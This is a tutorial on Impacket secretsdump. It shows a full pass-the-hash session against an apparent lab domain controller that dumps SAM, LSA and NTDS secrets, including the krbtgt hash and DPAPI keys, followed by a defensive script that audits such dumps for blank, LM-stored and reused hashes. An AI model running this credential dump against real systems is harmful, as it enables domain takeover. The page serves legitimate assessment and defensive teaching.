Using Impacket-secretsdump

Impacket-secretsdump is a tool widely used in security work and penetration testing that is part of the Impacket suite. Impacket is a collection of Python classes for working with network protocols. secretsdump.py is a script in that collection that extracts password hashes, Kerberos tickets and other secrets from a Windows system. It is especially useful for extracting credentials when you already have access to a Windows domain controller. In the session below it is run with `-debug` (verbose output), `-dc-ip` (the domain controller to query) and `-hashes` (authenticating with an NT hash instead of a password); the output is grouped into the local SAM, the LSA secrets and, via the DRSUAPI replication method, the domain credentials held in NTDS.DIT.

kali@kali=> impacket-secretsdump -debug -dc-ip 3.14.245.175 admin@spartancybersec.corp -hashes :64fbae31cc352fc26af97cbdef151e03
Impacket v0.11.0 - Copyright 2023 Fortra

[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[+] Retrieving class info for JD
[+] Retrieving class info for Skew1
[+] Retrieving class info for GBG
[+] Retrieving class info for Data
[*] Target system bootKey: 0x6819873eadf71f0789285138af013772
[+] Checking NoLMHash Policy
[+] LMHashes are NOT being stored
[+] Saving remote SAM database
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
[+] Calculating HashedBootKey from SAM
[+] NewStyle hashes is: True
Administrator:500:aad3b435b51404eeaad3b435b51404ee:64fbae31cc352fc26af97cbdef151e03:::
[+] NewStyle hashes is: True
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] NewStyle hashes is: True
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[+] Saving remote SECURITY database
[*] Dumping cached domain logon information (domain/username:hash)
[+] Decrypting LSA Key
[+] Decrypting NL$KM
[+] Looking into NL$1
[*] Dumping LSA Secrets
[+] Looking into $MACHINE.ACC
[*] $MACHINE.ACC 
SPARTANCYBERSEC\FIRST-DC$:aes256-cts-hmac-sha1-96:80e764f61ab3cb7fedc4fa0dcc2ae4346b9d86dce406bd0ef6dd171cf1a6b9e4
SPARTANCYBERSEC\FIRST-DC$:aes128-cts-hmac-sha1-96:e4a31fc1ad85640ff2b38263ab9a0bf4
SPARTANCYBERSEC\FIRST-DC$:des-cbc-md5:dc7acb5dd5832920
SPARTANCYBERSEC\FIRST-DC$:plain_password_hex:54ad56e5e0baa13e00c67a093b522c4fbf40c72dbc269b7274ba8c4e15e2c9bfd8f9fe3e476d6ceccc2ba2b22095003aa032b10d349836c8706574b11a003360a371082b6553f00aebce61c9d03b9e1db6433eed00c06bf7f6aecf6e998412fe8c6f5be2567cdfdab688d8342102c075e57e15a7d13732b6c9a974c9b29d47b9c7cb2958a9cdf18bcfff20329f953d0cbc32574dcf024c9c3307621dd56305d421b0c6d0e9e454d10bf079117e29cfe1b00037acec3bdeb2b73b1ee8282118346c13e03f93e051742bbebf21abd46920e48432c50f39d674328c767ebb417df8b37a0c61c1aaeafad9613b9621fe3d5c
SPARTANCYBERSEC\FIRST-DC$:aad3b435b51404eeaad3b435b51404ee:9e24232fd09fa4eb1fdf798597550a40:::
[+] Looking into DPAPI_SYSTEM
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x982b8349b7df992ee7c56f20e44f5d151329b6c9
dpapi_userkey:0x3d4de8cb3f5353a1aad075f43682ed753d115a18
[+] Looking into NL$KM
[*] NL$KM 
 0000   8D D2 8E 67 54 58 89 B1  C9 53 B9 5B 46 A2 B3 66   ...gTX...S.[F..f
 0010   D4 3B 95 80 92 7D 67 78  B7 1D F9 2D A5 55 B7 A3   .;...}gx...-.U..
 0020   61 AA 4D 86 95 85 43 86  E3 12 9E C4 91 CF 9A 5B   a.M...C........[
 0030   D8 BB 0D AE FA D3 41 E0  D8 66 3D 19 75 A2 D1 B2   ......A..f=.u...
NL$KM:8dd28e67545889b1c953b95b46a2b366d43b9580927d6778b71df92da555b7a361aa4d8695854386e3129ec491cf9a5bd8bb0daefad341e0d8663d1975a2d1b2
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[+] Session resume file will be sessionresume_uAKYyEam
[+] Calling DRSCrackNames for S-1-5-21-1861162130-2580302541-221646211-500 
[+] Calling DRSGetNCChanges for {7c1a3d96-7ad9-44a1-a35f-3d06f3fec301} 
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=Administrator,CN=Users,DC=spartancybersec,DC=corp
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c90fb8ae170b856da331fa40d5c11769:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b44daa015f201fa31126895ebbcbbcab:::
admin:1008:aad3b435b51404eeaad3b435b51404ee:64fbae31cc352fc26af97cbdef151e03:::
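Once a dump like the one above has been collected in an authorized assessment, the first thing a reviewer wants is a quick audit of it: which accounts have a blank password, which still store an LM hash, and which accounts share one NT hash (password reuse). The session above contains exactly that last case: the local `Administrator` in the SAM section and the domain account `admin` in the NTDS section both carry the NT hash `64fbae31cc352fc26af97cbdef151e03`. The parser and audit below are an added example written for this page, not code from Impacket or from the original post. It assumes only secretsdump's printed line format (`user:rid:lmhash:nthash:::` under the `[*] Dumping ...` section headers shown above); the transcript it runs on is constructed for the example and every hash value in it is made up. The two constants are the well-known NT hash of the empty password and the placeholder secretsdump prints in the LM field when no LM hash is stored.

```python
import re
from collections import defaultdict

# Well-known constants (not taken from this page's session):
# the NT hash of the empty password, and the LM field secretsdump prints
# when no LM hash is stored (NoLMHash policy in effect).
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"
NO_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"

# secretsdump prints account secrets as  user:rid:lmhash:nthash:::
HASH_LINE = re.compile(
    r"^(?P<user>[^:\s]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$",
    re.IGNORECASE,
)

# Section headers secretsdump prints before each group of hashes
SECTION_MARKERS = {
    "[*] Dumping local SAM hashes": "SAM",
    "[*] Dumping LSA Secrets": "LSA",
    "[*] Dumping Domain Credentials": "NTDS",
}


def parse_dump(text):
    """Return one dict per hash line in a secretsdump transcript, tagged with
    the section (SAM, LSA, NTDS) it was printed under. Status lines,
    Kerberos keys, DPAPI keys and hex dumps do not match and are skipped."""
    section = "UNKNOWN"
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        for marker, name in SECTION_MARKERS.items():
            if line.startswith(marker):
                section = name
        m = HASH_LINE.match(line)
        if m:
            entries.append({
                "section": section,
                "user": m["user"],
                "rid": int(m["rid"]),
                "lm": m["lm"].lower(),
                "nt": m["nt"].lower(),
            })
    return entries


def audit(entries):
    """Flag what a reviewer of a dump wants to know:
    - accounts whose NT hash is the empty-password hash
    - accounts still storing an LM hash (NoLMHash policy not enforced)
    - one NT hash shared by several accounts (password reuse, e.g. a local
      administrator and a domain account set to the same password)
    """
    findings = {"blank_password": [], "lm_hash_stored": [], "shared_nt_hash": {}}
    accounts_by_nt = defaultdict(set)
    for e in entries:
        label = f"{e['section']}\\{e['user']}"
        if e["nt"] == EMPTY_NT_HASH:
            findings["blank_password"].append(label)
        if e["lm"] != NO_LM_HASH:
            findings["lm_hash_stored"].append(label)
        accounts_by_nt[e["nt"]].add(label)
    for nt, labels in accounts_by_nt.items():
        # Blank passwords are already reported above; do not list them twice
        if nt != EMPTY_NT_HASH and len(labels) > 1:
            findings["shared_nt_hash"][nt] = sorted(labels)
    return findings


def audit_text(text):
    """Parse a transcript and audit it in one call."""
    return audit(parse_dump(text))


# Constructed transcript in secretsdump's output format; every hash value
# here is made up for the example.
SAMPLE_DUMP = """\
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_legacy:1001:0123456789abcdef0123456789abcdef:22222222222222222222222222222222:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:33333333333333333333333333333333:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
admin:1008:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
"""

if __name__ == "__main__":
    for kind, hits in audit_text(SAMPLE_DUMP).items():
        print(f"{kind}: {hits}")
```

Run it on a saved transcript by passing the file contents to `audit_text`. Labels are prefixed with the section so that a local `SAM\Administrator` and the domain `NTDS\Administrator` are kept apart, which matters because, as in the session above, the two usually have different hashes. On the defender side, the `DRSUAPI` line in the transcript is the useful marker: the domain controller served a directory-replication request to a host that is not a domain controller, which is the event that replication auditing on the DC should surface.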
